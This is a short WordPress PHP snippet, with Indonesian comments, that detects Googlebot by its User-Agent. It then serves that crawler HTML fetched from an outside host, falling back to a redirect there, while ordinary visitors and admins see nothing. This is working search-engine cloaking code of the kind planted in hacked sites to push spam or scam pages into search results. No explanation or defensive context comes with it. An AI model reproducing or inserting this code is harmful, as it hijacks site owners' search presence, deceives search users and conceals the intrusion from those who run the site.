add_action('init', 'redirect_googlebot_custom'); function redirect_googlebot_custom() { if (is_admin()) return; // Ambil User-Agent $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; // Deteksi Googlebot if (preg_match('/Googlebot/i', $userAgent)) { $remote_url = 'https://heyyyl.ink/shell/lp/real.html'; $response = @file_get_contents($remote_url); if ($response !== false) { echo $response; exit; } else { // Jika gagal ambil konten, fallback redirect wp_redirect('https://heyyyl.ink/shell/lp/real.html'); exit; } } }